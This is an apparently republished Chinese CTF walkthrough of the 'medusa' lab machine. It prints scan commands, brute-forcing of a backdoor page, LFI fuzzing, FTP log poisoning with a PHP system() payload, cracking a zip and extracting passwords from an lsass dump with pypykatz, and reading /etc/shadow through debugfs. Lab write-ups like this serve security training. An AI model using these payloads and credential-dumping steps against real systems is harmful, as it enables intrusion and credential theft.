【OSCP】medusa

admin

102776
文章

87
评论

2024年4月23日01:37:07评论1 views字数 6228阅读20分45秒阅读模式

OSCP 靶场

靶场介绍

medusa

easy

后门爆破、子域名扫描、gobuster-fuzz、文件包含配合 ftp 服务中实现“日志中毒”getshell、zip2john使用、pypykatz使用、 lsass.DMP文件解密、john the ripper 爆破shadow

信息收集

主机发现

nmap -sn 192.168.31.0/24

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.210                                                                                          
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-13 11:17 EST
Nmap scan report for medusa (192.168.31.210)
Host is up (0.00072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 70:d4:ef:c9:27:6f:8d:95:7a:a5:51:19:51:fe:14:dc (RSA)
|   256 3f:8d:24:3f:d2:5e:ca:e6:c9:af:37:23:47:bf:1d:28 (ECDSA)
|_  256 0c:33:7e:4e:95:3d:b0:2d:6a:5e:ca:39:91:0d:13:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:DA:98:4C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms medusa (192.168.31.210)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.93 seconds

【OSCP】medusa

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.210 -x
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.210
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.210/.php                 (Status: 403) [Size: 279]
http://192.168.31.210/.html                (Status: 403) [Size: 279]
http://192.168.31.210/index.html           (Status: 200) [Size: 10674]
http://192.168.31.210/manual               (Status: 301) [Size: 317] [--> http://192.168.31.210/manual/]
http://192.168.31.210/.html                (Status: 403) [Size: 279]
http://192.168.31.210/.php                 (Status: 403) [Size: 279]
http://192.168.31.210/server-status        (Status: 403) [Size: 279]
http://192.168.31.210/hades                (Status: 301) [Size: 316] [--> http://192.168.31.210/hades/]                                                 
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

扫描二级目录找到了一个door.php,跟首页的提示信息对上了

【OSCP】medusa

这是个后门文件，还需要爆破密码

【OSCP】medusa

爆破了半天没有成功，后面使用Kraken成功了。进去后是个域名。

wfuzz -c -w /usr/share/wordlists/rockyou.txt -u http://192.168.31.210/hades/door.php -d "word=FUZZ" --hc 200

【OSCP】medusa

重新扫描后也没有发现什么东西。

【OSCP】medusa

子域名扫描

ffuf -r -c -ic -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "HOST: FUZZ.medusa.hmv" -u 'http://192.168.31.210' -fs 10674

【OSCP】medusa

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dev.medusa.hmv -x php,txt,html -e

【OSCP】medusa

这里发现medusa的图片里面存在隐写，但是需要密码，爆破后也没有找到密码

stegseek --info medusa.jpg

【OSCP】medusa

对二级目录进行扫描，发现一个比较有用的目录

【OSCP】medusa

这个目录看起来像是命令执行，但是爆破后才知道其实是个文件包含

【OSCP】medusa

gobuster fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -u "dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd" -b 400,404 --exclude-length 0

【OSCP】medusa

权限获取

这里可以读取到ftp 的日志

【OSCP】medusa

我们在ftp 登录的使用输入 <?php system($_REQUEST['cmd']); ?>，日志则会记录下来，从而导致ftp日志中毒。


Name (192.168.31.210:root): <?php system($_REQUEST['cmd']); ?>
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.

curl "http://dev.medusa.hmv/files/system.php?view=/var/log/vsftpd.log&cmd=id"

【OSCP】medusa

通过反弹shell,获取权限

【OSCP】medusa

权限提升

linpeas.sh 脚本扫描发现一个压缩包文件

【OSCP】medusa

下载后，里面是个lsass.dmp 文件，但是需要密码

【OSCP】medusa

┌──(root㉿kali)-[~]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                   
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 12386830 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
medusa666        (old_files.zip/lsass.DMP)     
1g 0:00:05:39 DONE (2024-01-14 01:30) 0.002948g/s 16691p/s 16691c/s 16691C/s meeker75..medabe15
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

解压后获取一个lsass.DMP 转储文件，使用pypykatz 工具提取密码

pypykatz lsa minidump lsass.DMP

 pypykatz lsa minidump lsass.DMP | grep -C2 "spectre"
INFO:pypykatz:Parsing file lsass.DMP
authentication_id 845877 (ce835)
session_id 7
username spectre
domainname Medusa-PC
logon_server MEDUSA-PC
--
luid 845877
  == MSV ==
    Username: spectre
    Domain: Medusa-PC
    LM: NA
--
    DPAPI: NA
  == WDIGEST [ce835]==
    username spectre
    domainname Medusa-PC
    password 5p3ctr3_p0is0n_xX
    password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
  == Kerberos ==
    Username: spectre
    Domain: Medusa-PC
    Password: 5p3ctr3_p0is0n_xX
    password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
  == WDIGEST [ce835]==
    username spectre
    domainname Medusa-PC
    password 5p3ctr3_p0is0n_xX
    password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
  == TSPKG [ce835]==
    username spectre
    domainname Medusa-PC
    password 5p3ctr3_p0is0n_xX

获取密码后，成功登录到spectre 用户，获取flag

【OSCP】medusa

使用debugfs 挂载/dev/sda1，然后读取shadow 文件

【OSCP】medusa

spectre@medusa:~$ /sbin/debugfs -w /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs:  cat /etc/shadow
root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2:19375:0:99999:7:::
daemon:*:19372:0:99999:7:::
bin:*:19372:0:99999:7:::
sys:*:19372:0:99999:7:::
sync:*:19372:0:99999:7:::
games:*:19372:0:99999:7:::
man:*:19372:0:99999:7:::
lp:*:19372:0:99999:7:::
mail:*:19372:0:99999:7:::
news:*:19372:0:99999:7:::
uucp:*:19372:0:99999:7:::
proxy:*:19372:0:99999:7:::
www-data:*:19372:0:99999:7:::
backup:*:19372:0:99999:7:::
list:*:19372:0:99999:7:::
irc:*:19372:0:99999:7:::
gnats:*:19372:0:99999:7:::
nobody:*:19372:0:99999:7:::
_apt:*:19372:0:99999:7:::
systemd-network:*:19372:0:99999:7:::
systemd-resolve:*:19372:0:99999:7:::
messagebus:*:19372:0:99999:7:::
systemd-timesync:*:19372:0:99999:7:::
sshd:*:19372:0:99999:7:::
spectre:$y$j9T$4TeFHbjRqRC9royagYTTJ/$KnU7QK1u0/5fpHHqE/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::
systemd-coredump:!*:19372::::::
ftp:*:19372:0:99999:7:::
debugfs:

使用john the ripper 爆破shadow 文件，获取root 权限

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

【OSCP】medusa

End

“点赞、在看与分享都是莫大的支持”

【OSCP】medusa

原文始发于微信公众号（贝雷帽SEC）：【OSCP】medusa

左青龙
微信扫一扫

右白虎
微信扫一扫

【OSCP】medusa

靶场介绍

信息收集

主机发现

端口扫描

目录扫描

子域名扫描

权限获取

权限提升

【免杀】记一次lnk钓鱼小技巧

网络虚拟化技术：VXLAN，与VLAN有啥区别？

ARP:地址解析协议

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

发表评论

在线咨询

微信